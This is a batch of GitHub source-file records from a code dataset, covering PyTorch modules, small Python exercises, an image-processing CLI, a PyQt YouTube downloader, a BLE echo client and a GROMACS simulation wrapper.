\"torchscript\":\n try:\n with no_dispatch():\n real_inputs = list(map(defake, example_inputs))\n with torch.no_grad():\n traced_model = torch.jit.trace(model.eval(), real_inputs)\n traced_model = torch.jit.freeze(traced_model)\n return traced_model\n except Exception:\n warnings.warn(\"JIT trace failed during the IPEX compile process.\")\n return model\n else:\n raise RuntimeError(\n f\"Unexpected compilation path {_get_compiler_backend()} for ipex backend. Supported are 'inductor', 'torchscript'.\"\n )\n","repo_name":"intel/intel-extension-for-pytorch","sub_path":"intel_extension_for_pytorch/_inductor/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":1069,"dataset":"github-code","pt":"70"}
+{"seq_id":"25253122082","text":"import torch\nfrom torch import nn\nfrom FeatureVector import FeatureVector\n\n\nclass EpisodeModule(nn.Module):\n\n def __init__(self, embedding_size, middle_number, num_iterations):\n\n super().__init__()\n\n self.embedding_size = embedding_size\n self.middle_number = middle_number\n self.episode_gru = nn.GRU(\n input_size=embedding_size,\n hidden_size=embedding_size,\n num_layers=1,\n batch_first=True\n )\n self.memory_gru = nn.GRU(\n input_size=embedding_size,\n hidden_size=embedding_size,\n num_layers=1,\n batch_first=True\n )\n\n self.num_iterations = num_iterations\n\n self.g_score = FeatureVector(embedding_size, middle_number)\n\n\n def forward(self, m0, facts, question, h0=0):\n\n m = None\n h = None\n\n e = None\n\n for i in range(self.num_iterations):\n\n if i == 0:\n m = m0\n h = h0\n\n g = self.g_score(facts, m, question)\n\n if isinstance(h, int):\n\n episode_gru_output = self.episode_gru(facts)[1]\n h_new = g * episode_gru_output + (1 - g) * torch.zeros_like(g)\n else:\n h_new = g * self.episode_gru(facts, h)[1] + (1 - g) * h\n h = h_new\n e = h_new\n m = self.memory_gru(m, e)[0]\n\n return m\n","repo_name":"Elessar1996/dynamic_memory_network","sub_path":"EpisodeModule.py","file_name":"EpisodeModule.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5027310671","text":"from collections import defaultdict\nclass Solution:\n def groupAnagrams(self, strs):\n \n # groups = defaultdict(list)\n\n # for word in strs: # O(n)\n # key = sorted(word)\n \n # groups[key].append(word)\n\n # return [sorted(strs) for strs in groups.values()] # O(n*log(n))\n\n res = defaultdict(list) # mapping charCount to list of anagrams\n for word in strs:\n count = [0] * 26 # 26 letters in the alphabet\n # for every worl d, count the number of times each letter appears\n for c in word:\n count[ord(c) - ord('a')] += 1\n res[tuple(count)].append(word)\n return res.values() # O(n * m * 26)\n\n\nl = Solution()\nprint(l.groupAnagrams([\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]))","repo_name":"p1x31/ctci-python","sub_path":"leetcode/group_anagrams_49.py","file_name":"group_anagrams_49.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70528600227","text":"import requests\r\nimport pandas as pd\r\nimport collections\r\n\r\nurl = 'http://loterias.caixa.gov.br/wps/portal/loterias/landing/lotofacil/!ut/p/a1/04_Sj9CPykssy0xPLMnMz0vMAfGjzOLNDH0MPAzcDbz8vTxNDRy9_Y2NQ13CDA0sTIEKIoEKnN0dPUzMfQwMDEwsjAw8XZw8XMwtfQ0MPM2I02-AAzgaENIfrh-FqsQ9wBmoxN_FydLAGAgNTKEK8DkRrACPGwpyQyMMMj0VAcySpRM!/dl5/d5/L2dBISEvZ0FBIS9nQSEh/pw/Z7_HGK818G0K85260Q5OIRSC42046/res/id=historicoHTML/c=cacheLevelPage/=/'\r\n\r\nr = requests.get(url)\r\nr_text = r.text\r\ndf = pd.read_html(r_text)\r\n\r\n# type(df)\r\n# type(df[0])\r\n\r\ndf = df[0].copy()\r\nnr_pop = list(range(1, 26))\r\nnr_pares = list(range(2, 25, 2))\r\nnr_impares = list(range(1, 26, 2))\r\nnr_primos = [2, 3, 5, 7, 11, 13, 17, 19, 23]\r\n\r\ncomb = []\r\nv_numbers = {\r\n 'v_1': 0,\r\n 'v_2': 0,\r\n 'v_3': 0,\r\n 'v_4': 0,\r\n 'v_5': 0,\r\n 'v_6': 0,\r\n 'v_7': 0,\r\n 'v_8': 0,\r\n 'v_9': 0,\r\n 'v_10': 0,\r\n 'v_11': 0,\r\n 'v_12': 0,\r\n 'v_13': 0,\r\n 'v_14': 0,\r\n 'v_15': 0,\r\n 'v_16': 0,\r\n 'v_17': 0,\r\n 'v_18': 0,\r\n 'v_19': 0,\r\n 'v_20': 0,\r\n 'v_21': 0,\r\n 'v_22': 0,\r\n 'v_23': 0,\r\n 'v_24': 0,\r\n 'v_25': 0\r\n}\r\n\r\nlst_campos = ['Bola1', 'Bola2', 'Bola3', 'Bola4', 'Bola5', 'Bola6', 'Bola7', 'Bola8', 'Bola9', 'Bola10', 'Bola11', 'Bola12', 'Bola13', 'Bola14', 'Bola15']\r\n\r\nfor index, row in df.iterrows():\r\n V_PARES = 0\r\n V_IMPARES = 0\r\n V_PRIMOS = 0\r\n for campo in lst_campos:\r\n if row[campo] in nr_pares:\r\n V_PARES += 1\r\n if row[campo] in nr_impares:\r\n V_IMPARES += 1\r\n if row[campo] in nr_primos:\r\n V_PRIMOS += 1\r\n for n in nr_pop:\r\n if row[campo] == n:\r\n v_numbers[\"v_{}\".format(n)] += 1\r\n\r\n comb.append(str(V_PARES) + 'p-' + str(V_IMPARES) + 'i-' + str(V_PRIMOS) + 'np')\r\n\r\nless_fr = min(v_numbers, key=v_numbers.get)\r\nhigh_fr = max(v_numbers, key=v_numbers.get)\r\n\r\ncounter = collections.Counter(comb)\r\nresult = pd.DataFrame(counter.items(), columns=['combinação', 'frequencia'])\r\nresult['p_freq'] = result['frequencia']/result['frequencia'].sum()\r\nresult = result.sort_values(by='p_freq')","repo_name":"clarabatt/data_engineer_bootcamp","sub_path":"A001/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"75139247267","text":"import matplotlib.pyplot as plt\nimport os\n\ndef plot_img_and_mask(img, mask):\n classes = mask.shape[0] if len(mask.shape) > 2 else 1\n fig, ax = plt.subplots(1, classes + 1)\n ax[0].set_title('Input image')\n ax[0].imshow(img)\n if classes > 1:\n for i in range(classes):\n ax[i + 1].set_title(f'Output mask (class {i + 1})')\n ax[i + 1].imshow(mask[1, :, :])\n else:\n ax[1].set_title(f'Output mask')\n ax[1].imshow(mask)\n plt.xticks([]), plt.yticks([])\n plt.show()\n\ndef check_folder(folder1: str, folder2: str):\n dict_store = {folder1: os.listdir(folder1), folder2: os.listdir(folder2)}\n len_folder1 = len(dict_store[folder1])\n len_folder2 = len(dict_store[folder2])\n length = len_folder1 if len_folder1 <= len_folder2 else len_folder2\n idx = 0\n while idx < length:\n if dict_store[folder1][idx][0] != dict_store[folder2][idx][0]:\n if len_folder1 <= len_folder2:\n print(\"Not found in folder 1 and have found in folder2: \", dict_store[folder2][idx])\n else:\n print(\"Not found in folder 2 and have found in folderi: \", dict_store[folder1][idx])\n return False\n idx += 1\n return True","repo_name":"lehoangHUST/BK.AI-NAVER","sub_path":"Pytorch-UNet/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10818409850","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 19 13:23:00 2016\n\n@author: Jan-Philipp Kolb\n\"\"\"\n\n# Source: http://www.python-kurs.eu/tkinter_checkboxes.php\n\nfrom tkinter import *\nmaster = Tk()\n\ndef var_states():\n print(\"male: %d,\\nfemale: %d\" % (var1.get(), var2.get()))\n\nLabel(master, text=\"Your sex:\").grid(row=0, sticky=W)\nvar1 = IntVar()\nCheckbutton(master, text=\"male\", variable=var1).grid(row=1, sticky=W)\nvar2 = IntVar()\nCheckbutton(master, text=\"female\", variable=var2).grid(row=2, sticky=W)\nButton(master, text='Quit', command=master.quit).grid(row=3, sticky=W, pady=4)\nButton(master, text='Show', command=var_states).grid(row=4, sticky=W, pady=4)\nmainloop()\n\n# http://www.python-kurs.eu/tkinter_entry_widgets.php\n","repo_name":"Japhilko/DataAnalysis","sub_path":"python/pythonGUI/Checkbox.py","file_name":"Checkbox.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"75048702307","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport os\nimport argparse\n\nfrom filter import *\nfrom histogram import *\n\n# Add argument from command line or cmd in Linux or Windows 10.\ndef add_argument():\n # Init add argument from command line\n parser = argparse.ArgumentParser(\n description='Add Argument for task in image.')\n \n # Add argument.\n parser.add_argument('--input', default=None, type=str,\n help='Image input is path file and have type string.')\n parser.add_argument('--convert_RGB', default=True, type=int,\n help='We can choose image convert RGB or Gray. If RGB => True, else is False.')\n parser.add_argument('--save_info_image', default=True, type=bool,\n help='Save all information in image. Example: dynamic range, histogram, height and width of image_input')\n parser.add_argument('--case', default=None, type=int,\n help='Choose case to implement task.')\n \n args = parser.parse_args()\n return args\n\n# FORMATS OF IMAGE AND VIDEO\nIMG_FORMATS = ['jpg', 'jpeg', 'png'] # acceptable image suffixes\nVID_FORMATS = ['avi', 'mp4', 'gif'] # acceptable video suffixes\n\n# TASK CASE IN ASSIGNMENT.\nCASE = ['output',\n 'draw_hist',\n 'scale_histogram',\n 'histogram_equalizion',\n 'Median filter',\n 'Mean filter',\n 'Gauss filter',\n 'Sharp filter'] \n\n# '' mean nothing task.\n\n# Built class Image\nclass Image:\n \"\"\"\n We built class Image include func:\n 1. Calculate cumdf histogram of image. Example: Image gray, Image RGB or BGR....\n 2. Calculate dynamic range of image. Example: Image have to intensity from min: 0 -> max: 156.\n 3. Write information all about image in json.\n \"\"\"\n\n def __init__(self, path_file: str, RGB: int):\n # Func init paras input\n \"\"\"\n + Paras: \n 1. Para1: path_img is path of image in system. Maybe path_img is folder or file, self.path_file .\n 2. Para2: RGB is convert image from RGB or convert Gray, self.RGB . \n \"\"\"\n self.path_file = path_file\n self.RGB = RGB\n self.name_img = path_file.split('/')[-1].split('.')[0]\n\n # Check paras is true type ??\n assert os.path.isfile(self.path_file), f\"Not file image {self.path_file} in system.\"\n assert isinstance(self.RGB, int), f\"Para self.RGB only support {type(self.RGB)}.\"\n\n self.img_np = cv2.imread(self.path_file, self.RGB)\n if self.RGB == 0:\n self.img_np = self.img_np.reshape((self.img_np.shape[0], self.img_np.shape[1], 1))\n\n\n def dynamic_range(self):\n # calculate the dynamic range of values in that picture\n if self.img_np.shape[2] == 3:\n dynamic = {'Red': [np.min(self.img_np[:, : , 0]), np.max(self.img_np[:, :, 0])] ,\n 'Green': [np.min(self.img_np[:, :, 1]), np.max(self.img_np[:, :, 1])],\n 'Blue': [np.min(self.img_np[:, :, 2]), np.max(self.img_np[:, :, 2])]\n }\n else:\n dynamic = {'Gray': [np.min(self.img_np[:, :]), np.max(self.img_np[:, :])]}\n # Each channels Red, Blue or Green have dynamic range ?\n # Specific convert image have range intensity [L1, L2] to [L1', L2'].\n \n return dynamic\n \n # 4. Save file json (Contains about infor image.)\n def save_folder(self):\n print('*'*30)\n print(\"Start .... 
Loading\")\n # Information\n infor_img = {\n 'path': [],\n 'dynamic range': [],\n 'dimensional': []\n }\n infor_img['path'].append(self.path_file)\n infor_img['dynamic range'].append(self.dynamic_range())\n infor_img['dimensional'].append([self.img_np.shape[0], self.img_np.shape[1]])\n\n print(infor_img)\n # Write infor in file .json\n # with open(self.name_img + '_output' + '.json', 'w') as f:\n # json.dump(infor_img, f)\n print(\"Finish\")\n print('*'*30)\n\n\n# Run main\ndef run():\n\n # Read image if args.input have suffixes is '.jpg', '.jpeg', '.png'\n # Read video if args.input have suffixes is '.mp4', '.avi', '.gif'\n\n if args.input.split('/')[-1].split('.')[1] in IMG_FORMATS:\n img = Image(args.input, args.convert_RGB)\n else:\n raise ValueError(f\"Parameters not support for {VID_FORMATS}\")\n\n # Important\n \"\"\"\n case 0: Input: Image -> Output: cv2.imread() -> Type np.ndarray.\n case 1: Input: Image, bin -> Output: List histogram of image. \n case 2: Input: Image, src_range, dst_range -> Output: Image use scale histogram (Linear Transform)\n case 3: Input: Image -> Output: Image with Histogram Equalizion\n case 4: Input: Image -> Output: Image after use median filter.\n case 5: Input: Image -> Output: Image after use smoothing filter (Mean Filter)\n case 6: Input: Image -> Output: Image after use smoothing filter (Gauss Filter)\n case 7: Input: Image -> Output: Image after use sharpening filter (Laplacian filter)\n \"\"\"\n case = args.case\n # All case from 0 -> 6.\n if case == 0:\n # Write image and show image in display.\n cv2.imwrite(img.name_img + '_output' + '.png', img.img_np)\n elif case == 1:\n # Count histogram.\n hist = count_histogram(img.img_np)\n intensity_img = [x for x in range(256)]\n # Save plot of histogram in intensity.\n for channel in range(img.img_np.shape[2]):\n plt.plot(intensity_img, hist['Channel '+ str(channel + 1)])\n plt.xlabel('Intensity of image')\n plt.ylabel('Histogram of intensity')\n plt.savefig('Channel '+ str(channel + 1) + '.png')\n plt.title('Channel '+ str(channel + 1))\n plt.clf()\n elif case == 2:\n # Use for one channel is: Gray.\n src = img.dynamic_range()['Gray']\n new_img = scale_histogram(img.img_np, src, dst_range = [0, 200])\n cv2.imwrite(img.name_img + '_scale_histogram' + '.png', new_img)\n elif case == 3:\n new_img = histogram_equalizion(img.img_np)\n cv2.imwrite(img.name_img + '_histogram_equal' + '.png', new_img)\n elif case == 4:\n # Use median filter to reduce noise\n new_img = median_filter(img.img_np, filter_size=(5, 5))\n cv2.imwrite(img.name_img + '_median' + '.png', new_img)\n elif case == 5:\n new_img = mean_filter(img.img_np, filter_size=(5, 5))\n cv2.imwrite(img.name_img + '_mean' + '.png', new_img)\n elif case == 6:\n new_img = gauss_filter(img.img_np, filter_size=(5, 5), sigma=1)\n cv2.imwrite(img.name_img + '_gauss' + '.png', new_img)\n elif case == 7:\n new_img = laplacian_filter(img.img_np)\n cv2.imwrite(img.name_img + '_sharp' + '.png', new_img)\n else:\n raise ValueError(\"Not found case : {case} in program.\")\n\n# Run main\nif __name__ == '__main__':\n global args\n args = add_argument()\n run()","repo_name":"lehoangHUST/Digital-Image-Processing","sub_path":"Digital_Image_Processing/DIP.Assignment1_3/run_img.py","file_name":"run_img.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28701400727","text":"dictionary = {}\n\ndictionary['superman'] = 'he is very strong'\ndictionary['flash'] = 'he is the fastest man in the world'\n\ndictionary.pop('superman')\n\ndictionary = {'superman' : {'power1':'he is very strong', 'power2':'he can fly'},'flash' : 'he is the fastest man in the world', 'green lantern': 'he is the choosen one'}\n\nfor key in dictionary:\n print(key)\n print(dictionary[key])","repo_name":"deimos31/pythonAlfa","sub_path":"day10/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"8196004092","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport pytest\n\nfrom biorxiv_cli.cli import cli\n\n\n@pytest.mark.vcr()\ndef test_read_accepts_one_subject(runner):\n result = runner.invoke(cli, ['read', 'biochemistry'])\n\n assert 0 == result.exit_code\n assert 'Influence of SNF1' in result.output\n\n\n@pytest.mark.vcr()\ndef test_read_accepts_multiple_subjects(runner):\n result = runner.invoke(cli, ['read', 'genomics', 'bioinformatics'])\n\n assert 0 == result.exit_code\n assert 'SISS-Geo' in result.output\n\n\n@pytest.mark.vcr()\ndef test_read_falls_back_to_all_without_subjects(runner):\n result = runner.invoke(cli, ['read'])\n\n assert 0 == result.exit_code\n assert 'Neurodynamic explanation' in result.output\n","repo_name":"jacquerie/biorxiv-cli","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"70"}
+{"seq_id":"41142580786","text":"from PyQt5 import QtWidgets, QtCore , QtGui \nimport os\nfrom gui import Ui_MainWindow\nimport backend\nimport time\nclass Window(QtWidgets.QMainWindow,Ui_MainWindow):\n context = None\n\n\n def __init__(self):\n\n Window.context = self\n super().__init__()\n self.setupUi(self)\n self.show()\n self.message_credit()\n\n\n #Button Pressed Event\n self.download.pressed.connect(self.download_check)\n self.url_check.pressed.connect(self.checking_url)\n self.pushButton.pressed.connect(self.browser_location)\n \n global title_video\n\n def download_check(self):\n try:\n self.start_download()\n except:\n self.errrormessage_pass()\n\n def errrormessage_pass(self):\n \n emsg = QtWidgets.QMessageBox(self)\n emsg.setWindowModality(QtCore.Qt.WindowModal)\n self.Current_Status_Update(\"Waiting for Correct Values.\")\n msg=\"Not able to Download. \\n\\nFill all the Boxes Correctly. Be sure to check the Link and Select the Quality.\"\n emsg.setText(msg)\n emsg.setIcon(emsg.Critical)\n emsg.setWindowTitle(\"Incorrect Values\")\n emsg.exec_()\n return\n\n def browser_location(self):\n global path_save\n path_save = QtWidgets.QFileDialog.getExistingDirectory()\n path_save = path_save + \"/\"\n self.lineEdit_2.setText(path_save)\n\n def Current_Status_Update(self,text_update):\n self.label_4.setFont(QtGui.QFont(\"Miriam\", 11))\n self.label_4.setText(\"Current Status: \"+ text_update)\n \n def message_pass(self,msg):\n \n emsg = QtWidgets.QMessageBox(self)\n emsg.setWindowModality(QtCore.Qt.WindowModal)\n\n\n emsg.setText(msg)\n emsg.setIcon(emsg.Information)\n emsg.setWindowTitle(\"Sucessful\")\n emsg.exec_()\n self.clear_program()\n\n def message_credit(self):\n \n emsg = QtWidgets.QMessageBox(self)\n emsg.setWindowModality(QtCore.Qt.WindowModal)\n\n msg = \"Thanks for using this Application.For more Cool Stuffs & Source Code, Check my other Repositories on GitHub!! 
[https://github.com/imabhisht]\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t-Abhisht\"\n emsg.setText(msg)\n emsg.setIcon(emsg.Information)\n emsg.setWindowTitle(\"Startup Message\")\n emsg.exec_()\n\n def checking_url(self):\n global url\n global check\n check = 0\n url = self.lineEdit.text()\n alpha = backend.check_url(url)\n if alpha == \"correct\":\n self.label_5.setText(\"\")\n self.label_6.setPixmap(QtGui.QPixmap(\"Resources/tick.png\"))\n list_rev = backend.get_resolutions()\n self.quality_enable_control(list_rev)\n metdata = backend.metadata()\n self.get_metdata(metdata)\n self.lineEdit_2.clear()\n check = 1\n \n else:\n self.label_5.setText(\"Check Internet Connection or Insert valid link\")\n self.label_6.setPixmap(QtGui.QPixmap(\"Resources/wrong.png\"))\n\n def quality_enable_control(self,list_rev):\n if \"1080p\" in list_rev:\n self.comboBox.model().item(1).setEnabled(True)\n if \"720p\" in list_rev:\n self.comboBox.model().item(2).setEnabled(True)\n if \"480p\" in list_rev:\n self.comboBox.model().item(3).setEnabled(True)\n if \"360p\" in list_rev:\n self.comboBox.model().item(4).setEnabled(True)\n if \"240p\" in list_rev:\n self.comboBox.model().item(5).setEnabled(True)\n if \"144p\" in list_rev:\n self.comboBox.model().item(6).setEnabled(True)\n \n\n def get_metdata(self,metdata):\n global title_video\n title_video = metdata[0]\n self.preview_image.setPixmap(QtGui.QPixmap(r\"Cache\\local_image.jpg\"))\n self.title_preview.setFont(QtGui.QFont(\"Miriam\", 11))\n self.title_preview.setText(\"Title: \" + metdata[0])\n self.publisher_preview.setFont(QtGui.QFont(\"Miriam\", 11))\n self.publisher_preview.setText(\"Author: \"+metdata[1])\n self.views_preview.setFont(QtGui.QFont(\"Miriam\", 11))\n self.views_preview.setText(\"Views : \"+str(metdata[2]))\n self.size_preview.setFont(QtGui.QFont(\"Miriam\", 11))\n self.size_preview.setText(\"Length : \"+str(metdata[3]))\n self.Current_Status_Update(\"Ready to Download\")\n\n def clear_program(self):\n self.Current_Status_Update(\"Waiting for Next Video\")\n self.label_6.setPixmap(QtGui.QPixmap(\"Resources/white.png\"))\n self.label_5.setText(\"Inset New Link\")\n self.comboBox.setCurrentIndex(0)\n self.label_4.setText(\"Current Status: \")\n self.lineEdit_2.clear()\n self.lineEdit.clear()\n self.preview_image.setPixmap(QtGui.QPixmap(\"Resources/white.png\"))\n self.title_preview.setText(\"Title: \")\n self.publisher_preview.setText(\"Author: \")\n self.views_preview.setText(\"Views: \")\n self.size_preview.setText(\"Length: \")\n self.progressBar.setValue(0)\n\n def start_download(self):\n\n cout = 0\n while cout < 15:\n self.progressBar.setValue(cout)\n cout+=1\n\n self.Current_Status_Update(\"Current Status: Downloading Video & Audio\") \n rev = self.comboBox.currentText()\n backend.download(rev)\n while cout < 60:\n self.progressBar.setValue(cout)\n cout+=1\n self.Current_Status_Update(\"Current Status: Merging into one File...\")\n print(\"Downloaded Source Files...Going for Converting\")\n backend.compiling_files(path_save)\n while cout < 99:\n self.progressBar.setValue(cout)\n cout+=1\n self.message_pass(\"The Video \" + title_video + \" has been Successfully Downloaded!!\\n\\n Thanks for using!!\")\n self.clear_program()\n \n ","repo_name":"imabhisht/Youtube-Downloader-GUI","sub_path":"Python Souce Files/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"12708818187","text":"import time\n\nfrom adafruit_ble import BLERadio\nfrom adafruit_ble.advertising.standard import ProvideServicesAdvertisement\nfrom adafruit_ble.services.nordic import UARTService\n\nble = BLERadio()\nwhile True:\n while ble.connected and any(\n UARTService in connection for connection in ble.connections\n ):\n for connection in ble.connections:\n if UARTService not in connection:\n continue\n print(\"echo\")\n uart = connection[UARTService]\n uart.write(b\"echo\")\n # Returns b'' if nothing was read.\n one_byte = uart.read(4)\n if one_byte:\n print(one_byte)\n print()\n time.sleep(1)\n\n print(\"disconnected, scanning\")\n for advertisement in ble.start_scan(ProvideServicesAdvertisement, timeout=1):\n if UARTService not in advertisement.services:\n continue\n ble.connect(advertisement)\n print(\"connected\")\n break\n ble.stop_scan()\n","repo_name":"adafruit/Adafruit_CircuitPython_BLE","sub_path":"examples/ble_uart_echo_client.py","file_name":"ble_uart_echo_client.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"70"}
+{"seq_id":"19147107223","text":"\"\"\"\nCOMP 1510 - Assignment 2\nAuthor: Nicholas Johnston\nStu#: A01242666\nDate: November 18, 2020\n\"\"\"\nfrom unittest import TestCase\n\nfrom utilities import format_book_row\n\n\nclass TestFormatBookRow(TestCase):\n def test_format_book_row_valid_book(self):\n book_values = ['Dupre', 'Skyscrapers', 'BD&L', '12', 'Architecture', '20th Century']\n expected = \"Dupre\\tSkyscrapers\\tBD&L\\t12\\tArchitecture\\t20th Century\"\n actual = format_book_row(book_values)\n self.assertEqual(expected, actual)\n\n def test_format_book_row_with_a_nan_value(self):\n book_values = ['Eddings', 'Belgarath the Sorcerer', '', '34', 'Fiction', 'Fantasy']\n expected = \"Eddings\\tBelgarath the Sorcerer\\t\\t34\\tFiction\\tFantasy\"\n actual = format_book_row(book_values)\n self.assertEqual(expected, actual)\n","repo_name":"nejohnston/library-manager","sub_path":"test_suite/test_format_book_row.py","file_name":"test_format_book_row.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"72217555107","text":"#!/usr/bin/env python\n\n# import pandas as pd\nimport sys\nfrom time import sleep\nimport subprocess\nimport re\nfrom .analysis import *\n\n# pip install pandas\n\n# Autorship information\n__author__ = \"Hüsamettin Deniz Özeren\"\n__copyright__ = \"Copyright 2021\"\n__credits__ = [\"Hüsamettin Deniz Özeren\"]\n__license__ = \"GNU General Public License v3.0\"\n__maintainer__ = \"Hüsamettin Deniz Özeren\"\n__email__ = \"denizozeren614@gmail.com\"\n\n\nclass multiSys:\n def __init__(self, mdpfilePath):\n self.mdpfilePath = mdpfilePath\n\n def mdp_unbias(self):\n with open(self.mdpfilePath, \"r+\") as mdpFile:\n content = mdpFile.read()\n content = re.sub('continuation\\t\\t= yes', 'continuation\\t\\t= no', content) # noqa\n content = re.sub('gen_vel\\t\\t= no', 'gen_vel\\t\\t= yes', content)\n content = re.sub('gen_seed.*\\n|gen_temp.*\\n', '', content, flags=re.M) # noqa\n content = re.sub(r\"(gen_vel.*$)\", r\"\\1\\ngen_temp\\t\\t= 310\", content, flags=re.MULTILINE) # noqa #add temperature variable here\n content = re.sub(r\"(gen_temp.*$)\", r\"\\1\\ngen_seed\\t\\t= -1\", content, flags=re.MULTILINE) # noqa\n mdpFile.seek(0)\n mdpFile.write(content)\n mdpFile.truncate()\n\n def mdp_bias(self):\n with open(self.mdpfilePath, \"r+\") as mdpFile:\n content = mdpFile.read()\n content = re.sub('continuation\\t\\t= no', 'continuation\\t\\t= yes', content) # noqa\n content = re.sub('gen_seed.*\\n|gen_temp.*\\n', '', content, flags=re.M) # noqa\n content = re.sub('gen_vel\\t\\t= yes', 'gen_vel\\t\\t= no', content)\n mdpFile.seek(0)\n mdpFile.write(content)\n mdpFile.truncate()\n\n def distance(self, istep, dt, rdist):\n distance = subprocess.run(['gmx_mpi',\n 'distance',\n '-f', istep + '.trr',\n '-s', istep + '.tpr',\n '-oav', 'distance.xvg',\n '-dt', str(dt),\n '-select', rdist])\n error = distance.returncode\n if error != 0:\n sys.exit()\n\n SlopeObject = slope_5p()\n y1, slope, slope_intercept = SlopeObject.distance_slope()\n SlopeObject.log_slope(y1, slope, slope_intercept)\n return y1, slope\n\n def create_folder(self, mdp, init_gro, topol, index, maxwarn):\n pass\n\n def prepare_init(self, mdp, istep, init_gro, topol, index, maxwarn):\n prepare_init = subprocess.run(['gmx_mpi',\n 'grompp',\n '-f', mdp + '.mdp',\n '-o', istep + '.tpr',\n '-c', init_gro + '.gro',\n '-r', init_gro + '.gro',\n '-p', topol + '.top',\n '-n', index + '.ndx',\n '-maxwarn', str(maxwarn)])\n error = prepare_init.returncode\n print(error)\n if error != 0:\n sys.exit()\n\n def prepare(self, mdp, istep, pstep, topol, index, maxwarn):\n prepare = subprocess.run(['gmx_mpi',\n 'grompp',\n '-f', mdp + '.mdp',\n '-o', istep + '.tpr',\n '-c', pstep + '.gro',\n '-t', pstep + '.cpt',\n '-p', topol + '.top',\n '-n', index + '.ndx',\n '-maxwarn', str(maxwarn)])\n error = prepare.returncode\n print(error)\n if error != 0:\n sys.exit()\n\n def run(self, ntmpi, ntomp, dds, dlb, istep, gpu):\n if gpu == 0:\n pinoffset = 0\n\n elif gpu == 1:\n pinoffset = 12\n run = subprocess.run(['mpirun',\n '-np', str(ntmpi),\n 'gmx_mpi',\n 'mdrun',\n '-v',\n '-ntomp', str(ntomp),\n '-gpu_id', str(gpu),\n '-pin on',\n '-pinoffset', str(pinoffset),\n '-pinstride 1',\n '-dds', str(dds),\n '-dlb', dlb,\n '-deffnm', istep])\n error = run.returncode\n print(error)\n if error != 0:\n sys.exit()\n\n def clean_backups(self):\n print('\\nCleaning the backups...\\n')\n sleep(3)\n subprocess.run(['rm -f \\#*\\#'], shell=True) # noqa\n\n def stuckfixer(self, line_number, ps_time, nr, fixer):\n # reading last last 5, 8, 10 
lines to change simulation time if fixer = True in input.py\n distance = []\n if exists(\"log_slope.txt\") and fixer is True and nr > 10:\n with open(\"log_slope.txt\") as f:\n for line in (f.readlines()[-int(line_number):]):\n cols = line.split()\n distance.append(float(cols[0]))\n deviation_d = np.std(distance)\n if deviation_d < 0.03:\n with open(self.mdpfilePath, \"r+\") as mdpFile:\n content = mdpFile.read()\n content = re.sub('nsteps.*\\n', '', content, flags=re.M) # noqa\n content = re.sub(r\"(dt.*$)\", r\"\\1\\nnsteps = \"+str(ps_time), content, flags=re.MULTILINE) # noqa\n mdpFile.seek(0)\n mdpFile.write(content)\n mdpFile.truncate()\n else:\n with open(self.mdpfilePath, \"r+\") as mdpFile:\n content = mdpFile.read()\n content = re.sub('nsteps.*\\n', '', content, flags=re.M) # noqa\n content = re.sub(r\"(dt.*$)\", r\"\\1\\nnsteps = 300000\", content, flags=re.MULTILINE) # noqa\n mdpFile.seek(0)\n mdpFile.write(content)\n mdpFile.truncate()\n\n def stage(self, distance, rdist1, rdist2):\n if mean(distance) < 0.5:\n rdist = rdist2\n file_name = 'log_slope.txt'\n log_file = open(file_name, 'a+')\n log_file.write(\"----- Stage 2 has started... -----\")\n log_file.close()\n else:\n rdist = rdist1\n return rdist\n","repo_name":"hozeren/multigro","sub_path":"bin_py/multiSys.py","file_name":"multiSys.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
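The .mdp editing above repeatedly uses re.sub with re.MULTILINE and a backreference to drop a setting and re-append it after an anchor line. A stripped-down illustration of that pattern (the option values are invented):

import re

content = "dt\t\t= 0.002\nnsteps = 1000\n"
content = re.sub('nsteps.*\n', '', content, flags=re.M)                            # remove the old setting
content = re.sub(r"(dt.*$)", r"\1\nnsteps = 300000", content, flags=re.MULTILINE)  # re-append it right after the dt line
print(content)  # dt line followed by the new nsteps line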
